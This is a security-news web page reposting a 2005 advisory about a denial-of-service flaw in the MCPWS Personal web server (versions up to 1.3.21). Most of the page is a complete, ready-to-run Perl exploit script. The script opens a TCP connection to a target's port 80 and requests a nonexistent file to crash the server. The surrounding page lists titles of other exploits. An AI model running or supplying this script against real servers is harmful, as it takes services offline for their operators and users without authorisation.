首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MCPWS Personal DoS Exploit
来源:http://triplex.it-helpnet.de 作者:Nico 发布时间:2005-03-24  

MCPWS Personal DoS Exploit

Summary
MCPWS Personal web server has been found to contain a vulnerability whereby requesting a non-existing file a remote attacker can trigger an error in the program causing it to no longer respond to legitimate requests.

Credit:
The information has been provided by Nico Spicher.
The original article can be found at: http://triplex.it-helpnet.de/unsorted%20stuff/Exploits/mcpws.pl.txt

Details
Vulnerable Systems:
* MCPWS Personal version 1.3.21 and prior

Exploit:
#!/usr/bin/perl

# MCPWS Personal - Webserver <= 1.3.21 DoS Exploit
# Vendor: http://www.mcpsoftware.de
#
# The coder used a unsecure VB-function (Open) to open requested files
# and didn't include a working error handling (On Error Goto etc).
# It's possible to exploit this vulnerability by requesting files
# that don't exist. Successful exploitation results
# in a runtime error that stops the process.
#
# Nico Spicher [http://triplex.it-helpnet.de/]

use IO::Socket;

if (@ARGV < 1)
{
system "clear";
print "[-] MCPWS Personal-Web Server <= 1.3.21 DoS Exploit\n\n";
print "[-] Usage: dos_mcpws.pl <host ip>\n";
exit(1);
}
system "clear";

$server = $ARGV[0];
system "clear";
print "[-] MCPWS Personal-Web Server <= 1.3.21 DoS Exploit\n\n";
print "[-] Server IP: ";
print $server;
print "\n[-] Connecting to IP ...\n";

$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80"); unless ($socket) { die "[-] $server is offline\n" }

print "[-] Connected\n\n";

print "[-] Creating string\n";

$string="ABCDEFGHIJKLMNOPQRSTUVWXYZ";
# This file shouldn't exist :)

print "[-] Sending string\n\n";

print $socket "GET /".$string." HTTP/1.1\r\n\r\n";

print "[>] Attack successful - Server killed\n";
close($socket);



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel 2.4.x / 2.6.x use
·FreeCiv Server DoS Exploit
·Linux Kernel <= 2.6.11 sys_
·phpBB UID Exploit (Perl Exploi
·Apple Core Foundation Library
·Ocean FTP DoS (Exploit)
·LuxMan -f Option Buffer Overfl
·MailEnable Format String Vulne
·OpenBSD TCP TIMESTAMP Remote D
·Microsoft Windows WAB DoS
·AWStats Remote Command Executi
·LimeWire File Disclosure Explo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved